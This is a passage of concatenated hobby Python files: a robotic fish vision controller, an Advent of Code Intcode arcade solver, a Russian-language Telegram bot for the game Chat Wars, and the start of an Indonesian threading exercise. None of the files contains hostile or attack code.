The "heading" angle towards an object is calculated based on (pqr) coordinates as follows: atan2(r, sqrt(q^2 + p^2)). A positive angle switches the pectoral left fin on turn clockwise. A negative angles switches the pectoral right fin on to turn counterclockwise.
Returns:
(): Floats to the surface and turns on the spot if no object observed
"""
caudal_range = 20 # abs(heading) below which caudal fin is swithed on
right = vision.pqr_r
left = vision.pqr_l
# blob behind or lost
if not right.size and not left.size:
#print('cant see blob')
pecto_r.set_frequency(6)
pecto_r.on()
pecto_l.off()
caudal.off()
return
# calculate headings
if not right.size:
heading_l = np.arctan2(left[1, 0], left[0, 0]) * 180 / pi
heading_r = heading_l
elif not left.size:
heading_r = np.arctan2(right[1, 0], right[0, 0]) * 180 / pi
heading_l = heading_r
else:
heading_r = np.arctan2(right[1, 0], right[0, 0]) * 180 / pi
heading_l = np.arctan2(left[1, 0], left[0, 0]) * 180 / pi
heading = (heading_r + heading_l) / 2
# blob to the right
if heading > 0:
freq_l = 5 + 5 * abs(heading) / 180
pecto_l.set_frequency(freq_l)
#print('turn cw')
pecto_l.on()
pecto_r.off()
if heading < caudal_range:
caudal.on()
else:
caudal.off()
# blob to the left
elif heading < 0:
freq_r = 5 + 5 * abs(heading) / 180
pecto_r.set_frequency(freq_r)
#print('turn ccw')
pecto_r.on()
pecto_l.off()
if heading > -caudal_range:
caudal.on()
else:
caudal.off()
def transition():
"""Transitions between homing and orbiting. Uses pectoral right fin to align tangentially with the orbit.
"""
caudal.off()
pecto_l.off()
pecto_r.set_frequency(8)
pecto_r.on()
right = vision.pqr_r
try:
heading = np.arctan2(right[1, 0], right[0, 0]) * 180 / pi
except:
return
if heading > 45:
pecto_r.off()
global status
status = 'orbit'
def orbit(target_dist):
"""Orbits an object, e.g. two vertically stacked LEDs, at a predefined radius
Uses four zones to control the orbit with pectoral and caudal fins. The problem is reduced to 2D and depth control is handled separately.
Could make fin frequencies dependent on distance and heading, i.e., use proportianl control.
Args:
target_dist (int): Target orbiting radius, [mm]
"""
try:
dist = np.linalg.norm(vision.xyz_r[:2, 0]) # 2D, ignoring z
heading = np.arctan2(vision.pqr_r[1, 0], vision.pqr_r[0, 0]) * 180 / pi
except:
return
if dist > target_dist:
if heading < 90:
#print('fwd')
caudal.set_frequency(2.2)
pecto_r.off()
pecto_l.off()
else:
#print('cw')
caudal.set_frequency(1.4)
pecto_l.set_frequency(8)
pecto_l.on()
pecto_r.off()
else:
if heading < 90:
#print('ccw')
caudal.set_frequency(2.2)
pecto_r.set_frequency(8)
pecto_r.on()
pecto_l.off()
else:
#print('fwd')
caudal.set_frequency(2.2)
pecto_r.off()
pecto_l.off()
def main(max_centroids, run_time=60, target_dist=500):
"""Runs vision update, depth control, status-based action, and logging iteratively
Args:
max_centroids (int): Maximum expected centroids in environment
run_time (int, optional): Experiment time [s]
target_dist (int, optional): Orbit radius, [mm]
"""
t_start = time.time()
while time.time() - t_start < run_time:
# check environment and find blob centroids of leds
try:
vision.update()
except:
continue
# control depth
if depth_ctrl:
depth_ctrl_from_cam()
elif lock_depth:
depth_ctrl_from_depthsensor()
# orbit if 2 blobs are visible
if vision.xyz_r.size:
dist = np.linalg.norm(vision.xyz_r[:1, 0])
heading = np.arctan2(vision.pqr_r[1, 0], vision.pqr_r[0, 0]) * 180 / pi
elif vision.xyz_l.size:
dist = np.linalg.norm(vision.xyz_l[:1, 0])
heading = np.arctan2(vision.pqr_l[1, 0], vision.pqr_l[0, 0]) * 180 / pi
else:
caudal.off()
pecto_r.off()
pecto_l.off()
dist = target_dist + 1
heading = target_dist + 1
# act based on status
global status
if status == 'home':
dist_filtered = ema.update_ema(dist)
if dist_filtered < target_dist * 1.6:
status = 'transition'
else:
home()
elif status == 'transition':
transition()
elif status == 'orbit':
caudal.on()
orbit(target_dist)
# log status and centroids
t_passed = time.time() - t_start
log_status(t_passed, dist, heading, status)
log_centroids(round(t_passed, 3), 'right', max_centroids)
log_centroids(round(t_passed, 3), 'left', max_centroids)
# homing plus orbiting, 2D or 3D
status = 'home' # ['home', 'transition', 'orbit']
depth_ctrl = True # 2D or 3D, [False, True]
lock_depth = False # use depth sensor once at target depth, set to mm value
max_centroids = 2 # maximum expected centroids in environment
caudal = Fin(U_FIN_C1, U_FIN_C2, 2.2) # freq, [Hz]
dorsal = Fin(U_FIN_D1, U_FIN_D2, 6) # freq, [Hz]
pecto_r = Fin(U_FIN_PR1, U_FIN_PR2, 8) # freq, [Hz]
pecto_l = Fin(U_FIN_PL1, U_FIN_PL2, 8) # freq, [Hz]
photodiode = Photodiode()
leds = LEDS()
vision = Vision(max_centroids)
depth_sensor = DepthSensor()
ema = EMA(0.3)
initialize()
idle()
leds.on()
main(max_centroids, 120, 400) # run time, target distance
leds.off()
terminate()
|
solution.py
|
import os
import threading
import queue
import time
from utils.grid_tools_2d import Point, Vector
from utils.intcode_computer import IntCodeComputer, get_program
import curses
debug_log = "debug.txt"
class Terminal:
tiles = {
0: " ",
1: "█",
2: "▒",
3: "=",
4: "*",
}
def __init__(self, stdout=None, stdin=None, width=10, height=10, debug=False, log=None):
self.stdout = stdout
self.stdin = stdin
self.width = width
self.height = height
self.grid = self.generate_grid(width, height)
self.score = 0
self.running = False
self.debug = debug
self.log_file = log
self.screen = None
self.ai = AI(debug=debug, log=log)
def activate_curses(self):
self.log_debug("Activating Curses")
self.screen = curses.initscr()
curses.noecho()
curses.cbreak()
curses.curs_set(0)
# self.screen.nodelay(True)
self.screen.keypad(True)
self.game_win = curses.newwin(self.height, self.width, 0, 0)
self.score_win = curses.newwin(10, self.width, self.height, 0)
self.score_win.addstr(0, 0, "=" * self.width)
self.score_win.addstr(2, 0, "=" * self.width)
def deactivate_curses(self):
self.log_debug("Deactivating Curses")
curses.nocbreak()
self.screen.keypad(False)
curses.echo()
curses.endwin()
def log_debug(self, message):
if self.debug:
if self.log_file:
self.log_file.write(message)
self.log_file.write("\n")
self.log_file.flush()
else:
print(message)
@staticmethod
def generate_grid(width, height):
grid = []
for _ in range(height):
grid.append([0]*width)
return grid
def update(self, x, y, value):
self.log_debug("Update: ({}, {}) {}".format(x, y, value))
if x == -1 and y == 0:
# Score Update
self.score = value
if self.screen:
self.score_win.addstr(1, 0, str(value))
self.score_win.refresh()
else:
# Tile Update
self.grid[y][x] = value
if self.screen:
self.game_win.addstr(y, x, self.tiles[value])
self.game_win.refresh()
def vanilla_render(self):
if not self.debug:
print(chr(27) + "[2J")
print("====================")
for row in self.grid:
line = ""
for tile_id in row:
line += self.tiles[tile_id]
print(line)
print("====================")
print(self.score)
print("====================")
def render(self):
if self.screen is None:
self.vanilla_render()
else:
self.screen.refresh()
self.game_win.refresh()
self.score_win.refresh()
def read_stdout(self):
if self.stdout is None:
value = int(input("Input:"))
elif hasattr(self.stdout, 'get'):
value = self.stdout.get()
# timeouts = 0
# while self.running and timeouts < self.MAX_TIMEOUTS:
# try:
# value = self.input_queue.get(timeout=self.READ_TIMEOUT)
# except queue.Empty:
# timeouts += 1
# if self.debug:
# print("Input Timeout {} ({})".format(timeouts, self.input_queue.qsize()))
elif hasattr(self.stdout, 'pop'):
value = self.stdout.pop(0)
else:
raise RuntimeError("Invalid input configured.")
return value
def read_input(self):
key = self.screen.getch()
if key == ord('q'):
# Quit
self.running = False
elif key == curses.KEY_LEFT:
# Left arrow ==> (Left Joystick Position)
self.stdin.put(-1)
elif key == curses.KEY_RIGHT:
# Right arrow ==> (Right Joystick Position)
self.stdin.put(1)
elif key == -1 or key == curses.KEY_DOWN:
# No input/Down arrow ==> (Neutral Joystick Position)
self.stdin.put(0)
else:
self.log_debug("Unknown Input: {}".format(key))
def ai_input(self):
try:
move = self.ai.get_next_move(self.grid)
except Exception as e:
self.log_debug(str(e))
move = 0
self.log_debug("AI Move: {}".format(move))
self.stdin.put(move)
def process_events(self):
if self.stdout.qsize() >= 3:
x = self.read_stdout()
y = self.read_stdout()
tile_id = self.read_stdout()
self.update(x, y, tile_id)
return True
return False
def run(self):
self.running = True
self.activate_curses()
try:
while self.running:
self.render()
if self.process_events():
continue # Keep processing
# time.sleep(0.15)
# self.read_input()
self.ai_input()
except Exception as e:
self.log_debug(str(e))
finally:
self.deactivate_curses()
class AI:
def __init__(self, debug=True, log=None):
self.debug = debug
self.log_file = log
def log(self, message):
if self.log_file:
self.log_file.write(message)
self.log_file.write("\n")
else:
print(message)
@staticmethod
def find_ball_location(grid):
for y, row in enumerate(grid):
for x, tile_id in enumerate(row):
if tile_id == 4:
return x, y
raise ValueError("No Ball in Grid!")
@staticmethod
def find_paddle_location(grid):
for y, row in enumerate(grid):
for x, tile_id in enumerate(row):
if tile_id == 3:
return x, y
raise ValueError("No Paddle in Grid!")
def get_next_move(self, grid):
ball = self.find_ball_location(grid)
if self.debug:
self.log("Ball Location: ({},{})".format(*ball))
paddle = self.find_paddle_location(grid)
if self.debug:
self.log("Paddle Location: ({},{})".format(*paddle))
if ball[0] < paddle[0]:
# Move Left
return -1
elif ball[0] > paddle[0]:
# Move Right
return 1
else:
# Freeze
return 0
def count_blocks(grid):
blocks = 0
for row in grid:
for tile_id in row:
if tile_id == 2:
blocks += 1
return blocks
def run(program):
terminal_socket = queue.Queue()
joystick_socket = queue.Queue()
with open(debug_log, mode="w") as log:
terminal = Terminal(terminal_socket, joystick_socket, width=38, height=22, debug=True, log=log)
computer = IntCodeComputer(
program, input_queue=joystick_socket, output_queue=terminal_socket, name="ArcadeCabinet",
debug=True, log=log
)
computation_thread = threading.Thread(target=lambda: computer.run(memory_allocation_size=10000))
gui_thread = threading.Thread(target=lambda: terminal.run())
try:
computation_thread.start()
gui_thread.start()
except:
computer.running = False
terminal.running = False
computation_thread.join()
while terminal_socket.qsize() > 0:
pass
terminal.running = False
gui_thread.join()
blocks = count_blocks(terminal.grid)
print(count_blocks(terminal.grid))
print(terminal.score)
return blocks
def tests():
t = Terminal([1,2,3,6,5,4], 10, 10)
t.run()
print("Tests Done")
class ArcadeCabinet(IntCodeComputer):
def __init__(self, program, name="ArcadeCabinet", debug=False, log=None):
super().__init__(program, name=name, debug=debug, log=log)
self.terminal = Terminal(width=38, height=22, debug=debug, log=log)
self.instruction = []
self.ai = AI(debug=debug, log=log)
def output(self, address):
value = self.program_memory[address]
self.instruction.append(value)
if len(self.instruction) == 3:
self.terminal.update(*self.instruction)
self.terminal.render()
self.instruction = []
def input(self, store):
value = self.ai.get_next_move(self.terminal.grid)
self.program_memory[store] = value
def run(self, noun=None, verb=None, memory_allocation_size=None):
self.terminal.activate_curses()
try:
super().run(noun=noun, verb=verb, memory_allocation_size=memory_allocation_size)
finally:
self.terminal.deactivate_curses()
if __name__ == "__main__":
# tests()
input_file = os.path.join(os.path.dirname(os.path.abspath(__file__)), "Input")
program = get_program(input_file)
# Insert 2 quarters
program[0] = 2
arcade = ArcadeCabinet(program)
arcade.run(memory_allocation_size=10000)
print("Blocks:", count_blocks(arcade.terminal.grid))
print("Score:", arcade.terminal.score)
if False:
while True:
program = get_program(input_file)
# Insert 2 qurters
program[0] = 2
remaining_blocks = run(program)
if remaining_blocks == 0:
print("AI WON!")
break
|
advokado.py
|
#!/usr/bin/env python#!/usr/bin/env python
# -*- coding: utf-8 -*-
import random
import schedule as schedule
import telebot
import configparser
import re
import time
from datetime import datetime, timedelta
import traceback
import threading
from database import DataBase
# import drawer #чекнуть что с этой залупой
config = configparser.ConfigParser()
config.read("config.ini")
# Присваиваем значения внутренним переменным
token = config['Telegram']['token']
ADEPT_ID = int(config['Telegram']['ADEPT_ID'])
cw_ID = int(config['Telegram']['cw_ID'])
bot = telebot.TeleBot(token, True, 4)
last_pinned_msg = None
print('Arbeiten!')
def schedule_pending():
while True:
schedule.run_pending()
time.sleep(1)
thr = threading.Thread(target=schedule_pending)
thr.daemon = False
thr.start()
def go_to_arena():
print("go_to_arena")
msg = bot.send_message(ADEPT_ID, 'Время побеждать, гоу на арену')
bot.pin_chat_message(ADEPT_ID, msg.message_id)
def ping_for_battle():
try:
print('try ping_for_battle')
db = DataBase()
cur = db.select_data_pin_battle()
if len(cur) > 0:
for item in cur:
bot.send_message(item[1], 'Гоу в битву Adept @' + item[0])
except:
print("don't ping_for_battle. ~~~" + str(
time.strftime("%d.%m.%y %H:%M:%S", time.localtime())) + "\n\n" + traceback.format_exc() + "\n\n")
@bot.message_handler(commands=['start'])
def start_message(message):
db = DataBase()
try:
data = [message.from_user.id, message.from_user.username, message.chat.id]
db.update_data_user(data)
db.close()
bot.send_message(message.chat.id, 'Привет моё сладенькое ADvokADo ' + message.from_user.username)
except:
print("don't insert from start_message. ~~~" + str(
time.strftime("%d.%m.%y %H:%M:%S", time.localtime())) + "\n\n" + traceback.format_exc() + "\n\n")
db.close()
@bot.message_handler(commands=['get_me'])
def get_me(message):
db = DataBase()
try:
data = [message.from_user.id, message.chat.id]
response = db.select_get_me(data)
if response:
# exp, gold, stock, hp, lastHit
result = 'Battle count = ' + str(response[0][0])
result += '\nExp = ' + str(response[0][1])
result += '\nGolg = ' + str(response[0][2])
result += '\nStock = ' + str(response[0][3])
result += '\nHp = ' + str(response[0][4])
result += '\nLast Hit = ' + str(response[0][5])
result += '\nKnockout = ' + str(response[0][6])
# result = '\n'.join('.'.join(map(str, s)) for s in query)
bot.send_message(message.chat.id, '<u><b>Summary:</b></u>\n\n' + result, parse_mode='HTML')
else:
bot.send_message(message.chat.id, 'Ты еще не нюхал пороха, воин ' + message.from_user.username)
db.close()
except:
print("don't get_me. ~~~" + str(time.strftime("%d.%m.%y %H:%M:%S", time.localtime()))
+ "\n\n" + traceback.format_exc() + "\n\n")
db.close()
@bot.message_handler(commands=['get_topchik'])
def get_topchik_msg(message):
get_topchik(False)
def get_topchik(week=True):
db = DataBase()
try:
result = ''
response = db.select_top_count_battle(1, week)
if response:
result = '<u><b>Самый впрягающийся</b></u>\n{0}\t{1}\n\n'.format(str(response[0][1]), str(response[0][0]))
response = db.select_top_last_hit(1, week)
if response:
result += '<u><b>Убийца</b></u>\n{0}\t{1}\n\n'.format(str(response[0][1]), str(response[0][0]))
response = db.select_top_exp(1, week)
if response:
result += '<u><b>Самый опытный</b></u>\n{0}\t{1}\n\n'.format(str(response[0][1]), str(response[0][0]))
response = db.select_top_gold(1, week)
if response:
result += '<u><b>Самый богатый</b></u>\n{0}\t{1}\n\n'.format(str(response[0][1]), str(response[0][0]))
response = db.select_top_stock(1, week)
if response:
result += '<u><b>Самый запасливый</b></u>\n{0}\t{1}\n\n'.format(str(response[0][1]), str(response[0][0]))
response = db.select_top_hp(1, week)
if response:
result += '<u><b>Человек-месиво</b></u>\n{0}\t{1}\n\n'.format(str(response[0][1]), str(response[0][0]))
# result = '\n'.join('.'.join(map(str, s)) for s in query)
response = db.select_top_knockout(1, week)
if response:
result += '<u><b>Человек-зомби</b></u>\n{0}\t{1}\n\n'.format(str(response[0][1]), str(response[0][0]))
# result = '\n'.join('.'.join(map(str, s)) for s in query)
db.close()
if result != '':
bot.send_message(ADEPT_ID, result, parse_mode='HTML')
else:
bot.send_message(ADEPT_ID, 'Нет еще топчика в этом чатике)')
except:
print("don't get_topchik. ~~~" + str(time.strftime("%d.%m.%y %H:%M:%S", time.localtime()))
+ "\n\n" + traceback.format_exc() + "\n\n")
db.close()
@bot.message_handler(commands=['get_all'])
def get_all(message):
db = DataBase()
try:
response = db.select_get_all()
if response:
result = '\n'.join('\t'.join(map(str, s)) for s in response)
# drawer.create_image(result)
bot.send_photo(message.chat.id, photo=open('result.png', 'rb'))
# result = '\n'.join('.'.join(map(str, s)) for s in query)
# bot.send_message(message.chat.id, '<u><b>Summary:</b></u>\n\n' + result, parse_mode='HTML')
else:
bot.send_message(message.chat.id, 'Случилась какая-то херня с get_all')
db.close()
except:
print("don't get_all. ~~~" + str(time.strftime("%d.%m.%y %H:%M:%S", time.localtime()))
+ "\n\n" + traceback.format_exc() + "\n\n")
db.close()
@bot.message_handler(content_types=["new_chat_members"])
def add_new_member(message):
try:
# user_list = message.new_chat_members
# print(user_list)
for user in message.new_chat_members:
bot.send_message(message.chat.id, "Welcome to Hell, @{0}!".format(user.username))
except:
print("don't add_new_member. ~~~" + str(
time.strftime("%d.%m.%y %H:%M:%S", time.localtime())) + "\n\n" + traceback.format_exc() + "\n\n")
@bot.message_handler(content_types=["pinned_message"])
def save_pinned_message(message):
try:
global last_pinned_msg
last_pinned_msg = message.pinned_message
except:
print("don't save_pinned_message. ~~~" + str(
time.strftime("%d.%m.%y %H:%M:%S", time.localtime())) + "\n\n" + traceback.format_exc() + "\n\n")
@bot.message_handler(content_types=["left_chat_member"])
def kick_member(message):
try:
bot.send_message(message.chat.id, "Go Home, {0}!".format(message.left_chat_member.username))
except:
print("don't kick_member. ~~~" + str(
time.strftime("%d.%m.%y %H:%M:%S", time.localtime())) + "\n\n" + traceback.format_exc() + "\n\n")
@bot.message_handler(commands=['ping'])
def start_message(message):
# print(message.chat.id)
bot.send_message(message.chat.id, 'Живее всех живых')
@bot.message_handler(commands=['random'])
def get_random(message):
try:
random.seed(message.message_id)
digit = message.text.lower()[7:].strip()
if digit.isdigit() and int(digit) > 0:
bot.send_message(message.chat.id, str(random.randint(1, int(digit))),
reply_to_message_id=message.message_id)
else:
bot.send_message(message.chat.id, 'Параметр не является числом, либо он меньше 1',
reply_to_message_id=message.message_id)
except:
print("don't get_random. ~~~" + str(time.strftime("%d.%m.%y %H:%M:%S", time.localtime()))
+ "\n\n" + traceback.format_exc() + "\n\n")
# @bot.message_handler(func=all_castle_bigpisi, commands=['add_trigger'])
@bot.message_handler(commands=['add_trigger'])
def add_trigger(message):
try:
if message.reply_to_message:
if len(message.text.lower()[13:]) >= 3: # and is_good_name_for_trigger(message.text.lower()):
db = DataBase()
if not db.is_trigger(message.text.lower()[13:], message.chat.id):
# добавить в бд
if message.reply_to_message.sticker:
data = [message.text.lower()[13:], message.reply_to_message.sticker.file_id, "sticker",
message.from_user.id, message.from_user.username, message.chat.id, message.date]
db.add_trigger(data)
elif message.reply_to_message.photo:
data = [message.text.lower()[13:], message.reply_to_message.photo[0].file_id, "photo",
message.from_user.id, message.from_user.username, message.chat.id, message.date]
db.add_trigger(data)
elif message.reply_to_message.video:
data = [message.text.lower()[13:], message.reply_to_message.video.file_id, "video",
message.from_user.id, message.from_user.username, message.chat.id, message.date]
db.add_trigger(data)
elif message.reply_to_message.voice:
data = [message.text.lower()[13:], message.reply_to_message.voice.file_id, "voice",
message.from_user.id, message.from_user.username, message.chat.id, message.date]
db.add_trigger(data)
elif message.reply_to_message.audio:
data = [message.text.lower()[13:], message.reply_to_message.audio.file_id, "audio",
message.from_user.id, message.from_user.username, message.chat.id, message.date]
db.add_trigger(data)
elif message.reply_to_message.document:
data = [message.text.lower()[13:], message.reply_to_message.document.file_id, "document",
message.from_user.id, message.from_user.username, message.chat.id, message.date]
db.add_trigger(data)
elif message.reply_to_message.video_note:
data = [message.text.lower()[13:], message.reply_to_message.video_note.file_id, "video_note",
message.from_user.id, message.from_user.username, message.chat.id, message.date]
db.add_trigger(data)
elif message.reply_to_message.text:
data = [message.text.lower()[13:], message.reply_to_message.text, "text",
message.from_user.id, message.from_user.username, message.chat.id, message.date]
db.add_trigger(data)
bot.send_message(message.chat.id, "Триггер '" + message.text[13:] + "' добавлен.")
else:
bot.send_message(message.chat.id, "Триггер '" + message.text[13:] + "' уже занесен в базу.")
db.close()
else:
bot.send_message(message.chat.id, "Неккоректное имя триггера менее 3 символов")
else:
bot.send_message(message.chat.id, "Нет реплейнутого сообщения.")
except:
db.close()
print("don't add_trigger. ~~~" + str(time.strftime("%d.%m.%y %H:%M:%S", time.localtime()))
+ "\n\n" + traceback.format_exc() + "\n\n")
@bot.message_handler(commands=['del_trigger'])
def del_trigger(message):
try:
db = DataBase()
if db.is_trigger(message.text.lower()[13:], message.chat.id): # если триггер существует
db.delete_trigger(message.text.lower()[13:], message.chat.id) # удалить триггер
bot.send_message(message.chat.id, "Триггер '" + message.text[13:] + "' удалён.")
else:
bot.send_message(message.chat.id, "Триггера '" + message.text[13:] + "' не существует.")
db.close()
except:
db.close()
print("don't del_trigger. ~~~" + str(time.strftime("%d.%m.%y %H:%M:%S", time.localtime()))
+ "\n\n" + traceback.format_exc() + "\n\n")
# @bot.message_handler(content_types=['sticker'])
# def get_info_about_messages(message):
# print(message)
# def is_good_name_for_trigger(text):
# match = re.match('^[а-яА-ЯёЁa-zA-Z0-9]+$', text)
# return bool(match)
def find_trigger_in_message(message):
print(message)
try:
# if is_good_name_for_trigger(message.text.lower()):
db = DataBase()
response = db.is_trigger(message.text.lower(), message.chat.id)
if response:
trigger_type = ''.join(response[0][0])
trigger_value = ''.join(response[0][1])
if trigger_type == "text":
bot.send_message(message.chat.id, trigger_value)
elif trigger_type == "sticker":
bot.send_sticker(message.chat.id, trigger_value)
elif trigger_type == "voice":
bot.send_voice(message.chat.id, trigger_value)
elif trigger_type == "audio":
bot.send_audio(message.chat.id, trigger_value)
elif trigger_type == "video":
bot.send_video(message.chat.id, trigger_value)
elif trigger_type == "document":
bot.send_document(message.chat.id, trigger_value)
elif trigger_type == "photo":
bot.send_photo(message.chat.id, trigger_value)
elif trigger_type == "video_note":
bot.send_video_note(message.chat.id, trigger_value)
elif message.text.lower() == "список триггеров":
query = db.get_trigger_list(message.chat.id)
result = '\n'.join('.'.join(map(str, s)) for s in query)
bot.send_message(message.chat.id, '<u><b>Список тригеров:</b></u>\n' + result, parse_mode='HTML')
db.close()
except:
print("don't find_trigger_in_message. ~~~" + str(time.strftime("%d.%m.%y %H:%M:%S", time.localtime()))
+ "\n\n" + traceback.format_exc() + "\n\n")
@bot.message_handler(content_types=['sticker'])
def congratulation_level_up(message):
if message.sticker.set_name == 'ChatwarsLevels':
bot.send_message(message.chat.id, text="Грац! Совсем большой стал, @{0}!".format(message.from_user.username,
reply_to_message_id=message.message_id))
elif message.sticker.set_name == 'ChatwarsLevelsF':
bot.send_message(message.chat.id, text="Грац! Совсем большая стала, @{0}!".format(message.from_user.username,
reply_to_message_id=message.message_id))
@bot.message_handler(content_types=['text'])
def get_text_messages(message):
print(message.chat.id)
if message.forward_from is None:
find_trigger_in_message(message)
if message.forward_from is not None and message.forward_from.id == cw_ID and re.search("встреча",
message.text.lower()):
data = [message.message_id, message.forward_date, message.from_user.id, message.from_user.username,
message.chat.id]
data.extend(get_about_msg(message.text))
data.append(message.date)
db = DataBase()
response = db.select_data_fight_ambush_result(data) # 'forward_date': 1605379349
# if len(response) == 0:
if not response:
db.insert_data_fight_ambush_result(data)
else:
bot.send_message(message.chat.id, text="Репорт уже занесен в базу",
reply_to_message_id=message.message_id)
# print(message)
if message.forward_from is not None and message.forward_from.id == cw_ID and re.search("враждебных существ",
message.text.lower()):
# (datetime.utcfromtimestamp(int(message.forward_date)).strftime('%Y-%m-%d %H:%M:%S'))
msg_date = datetime.utcfromtimestamp(int(message.forward_date))
date_now = datetime.now().utcnow()
add_time = 3 * 60 # * 600
if re.search("ambush", message.text.lower()):
add_time = 5 * 60
if msg_date + timedelta(seconds=add_time) > date_now:
bot.pin_chat_message(message.chat.id, message.message_id)
####################################
text = message.text
fight = text[text.find('/fight'):len(text)]
btn_fight = get_two_button_fight(fight)
delta = msg_date + timedelta(seconds=add_time) - date_now
msg = bot.send_message(message.chat.id, text="<u><b>Killer's Ambush</b></u>" + "\n\nTime left "
+ '{:02}:{:02}'.format(delta.seconds // 60,
delta.seconds % 60),
reply_markup=btn_fight, parse_mode='HTML')
thread_timer = threading.Thread(target=check_send_messages, args=(delta.seconds, 10, msg, btn_fight))
thread_timer.daemon = False
thread_timer.start()
else:
bot.pin_chat_message(message.chat.id, message.message_id)
unpin_message(message)
# return info from message.text
# [msg.message.message_id, msg.from_user.id,msg.from_user.username, msg.chat.id]
def get_about_msg(txt):
try:
exp = re.search('Exp:.*?(\d+)', txt)
gold = re.search('Gold:.*?(\d+)', txt)
stock = re.search('Stock:.*?(\d+)', txt)
hp = re.search('Hp:.*?(-?\d+)', txt)
last_hit = re.search('Ластхит:.*?(\d+)', txt)
knockout = re.search('В нокауте:.*?(\d+)', txt)
print(exp, gold, stock, hp, last_hit)
exp = int(exp.group(1)) if exp else 0
gold = int(gold.group(1)) if gold else 0
stock = int(stock.group(1)) if stock else 0
hp = int(hp.group(1)) if hp else 0
last_hit = int(last_hit.group(1)) if last_hit else 0
knockout = int(knockout.group(1)) if knockout else 0
return [exp, gold, stock, hp, last_hit, knockout]
except:
print("don't get_about_msg. ~~~" + str(time.strftime("%d.%m.%y %H:%M:%S", time.localtime()))
+ "\n\n" + traceback.format_exc() + "\n\n")
def unpin_message(message):
try:
bot.unpin_chat_message(message.chat.id)
bot.edit_message_text(chat_id=message.chat.id, message_id=message.message_id,
text="Сообщение устарело")
# global last_pinned_msg
# if last_pinned_msg is not None:
# bot.pin_chat_message(message.chat.id, last_pinned_msg.message_id)
# last_pinned_msg = None
except:
print("don't unpin_message ~~~" + str(
time.strftime("%d.%m.%y %H:%M:%S", time.localtime())) + "\n\n" + traceback.format_exc() + "\n\n")
def get_two_button_fight(query):
keyboard = telebot.types.InlineKeyboardMarkup()
btn_1 = telebot.types.InlineKeyboardButton(text="SendToCW", switch_inline_query=query)
btn_2 = telebot.types.InlineKeyboardButton(text="GoFight", callback_data=query)
keyboard.add(btn_1, btn_2)
return keyboard
# это функция отправки сообщений по таймеру
def check_send_messages(duration, dt, message, btn_fight):
while duration:
# пауза между проверками, чтобы не загружать процессор
time.sleep(dt)
duration -= dt
if duration < 0:
duration = 0
fight_user = get_user_fight_ambush(message.message_id)
bot.edit_message_text(chat_id=ADEPT_ID, message_id=message.message_id,
text="<u><b>Killer's Ambush</b></u>\n\n" + fight_user + "\n\nTime left "
+ '{:02}:{:02}'.format(duration // 60, duration % 60),
reply_markup=btn_fight, parse_mode='HTML')
unpin_message(message)
# Великолепный план, Уолтер. Просто охуенный, если я правильно понял. Надёжный, блядь, как швейцарские часы.
def get_user_fight_ambush(message_id):
try:
db = DataBase()
users = db.select_user_fight_ambush(message_id)
fight_user = '\n'.join('.'.join(map(str, s)) for s in users)
db.close()
return fight_user
except:
print("don't get_user_fight_ambush. ~~~" + str(
time.strftime("%d.%m.%y %H:%M:%S", time.localtime())) + "\n\n" + traceback.format_exc() + "\n\n")
@bot.callback_query_handler(func=lambda msg: re.search('fight', msg.data))
def callback_inline_first(msg):
try:
db = DataBase()
data = [msg.from_user.id, msg.message.message_id]
cur = db.select_data_fight_ambush(data)
if len(cur) > 0:
bot.answer_callback_query(msg.id, show_alert=True, text="НЕ тыкай больше")
else:
tmp = db.select_count_data_fight_ambush(msg.message.message_id)
if tmp[0][0] >= 4:
bot.answer_callback_query(msg.id, show_alert=True, text="В следующий раз доблестный воин")
else:
data = [msg.message.message_id, msg.from_user.id, msg.from_user.username, msg.message.chat.id]
db.insert_data_ambush(data)
fight_user = get_user_fight_ambush(msg.message.message_id)
bot.edit_message_text(chat_id=ADEPT_ID, message_id=msg.message.message_id,
text="<u><b>Killer's Ambush</b></u>\n\n" + fight_user + "\n\n" + msg.message.text[
-15:],
reply_markup=get_two_button_fight(msg.data),
parse_mode='HTML')
db.close()
except:
print("don't insert from callback_inline_first. ~~~" + str(
time.strftime("%d.%m.%y %H:%M:%S", time.localtime())) + "\n\n" + traceback.format_exc() + "\n\n")
schedule.every().monday.at("12:00").do(get_topchik)
#schedule.every().thursday.at("06:15").do(get_topchik)
schedule.every().day.at("13:00").do(go_to_arena)
schedule.every().day.at("00:55").do(ping_for_battle)
# schedule.every(1).minutes.do(ping_for_battle)
schedule.every().day.at("16:55").do(ping_for_battle)
schedule.every().day.at("08:55").do(ping_for_battle)
while True:
try:
bot.polling(none_stop=True, interval=1) # , timeout=20)
except:
bot.stop_polling()
time.sleep(5)
print("Бот пал. ~~~" + str(
time.strftime("%d.%m.%y %H:%M:%S", time.localtime())) + "\n\n" + traceback.format_exc() + "\n\n")
|
1194021_M. RIZKY_D4 TI - 3A_UTS SISTER.py
|
import logging
import multiprocessing
import threading
from time import sleep
from random import randrange
LOG_FORMAT = '%(asctime)s %(threadName)-17s %(levelname)-8s %(message)s'
logging.basicConfig(level=logging.INFO, format=LOG_FORMAT)
foods = []
condition = threading.Condition()
num_chef = 3
chef = ['Chef 1', 'Chef 2', 'Chef 3']
synchronizerThreading = threading.Barrier(num_chef)
synchronizerMultiProc = multiprocessing.Barrier(num_chef)
class Consumer(threading.Thread):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.kwargs = kwargs['kwargs']
def consume(self):
with condition:
if len(foods) == 0:
logging.info('Tidak ada makanan yang di makan, status : {}'.format(self.kwargs["stat3"]))
condition.wait()
foods.pop()
logging.info('Memakan 1 makanan, status : {}'.format(self.kwargs["stat1"]))
condition.notify()
def run(self):
for i in range(21):
sleep(2)
self.consume()
class Producer(threading.Thread):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.kwargs = kwargs['kwargs']
def produce(self):
with condition:
if len(foods) == 10:
logging.info('Total makakanan dibuat {}. Berhenti, status : {}'.format(len(foods), self.kwargs['stat2']))
condition.wait()
foods.append(1)
logging.info('Total makanan {}'.format(len(foods)))
condition.notify()
def run(self):
for i in range(20):
sleep(0.5)
self.produce()
def chef_challengeThread():
name = chef.pop()
sleep(randrange(2, 5))
print('%s menyelesaikan lomba Thread ' % (name))
synchronizerThreading.wait()
def chef_challengeMultiProc(synchronizerMultiProc, serializer):
name = multiprocessing.current_process().name
sleep(randrange(2, 5))
synchronizerMultiProc.wait()
with serializer:
print('%s menyelesaikan lomba Multi Proc ' % (name))
def main():
print('Lomba Masak Multi Proc Mulai')
for i in range(num_chef):
serializer = multiprocessing.Lock()
